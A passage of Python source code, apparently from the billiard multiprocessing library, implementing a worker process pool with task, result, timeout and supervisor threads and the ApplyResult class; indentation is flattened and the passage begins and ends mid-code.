synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, signal.SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
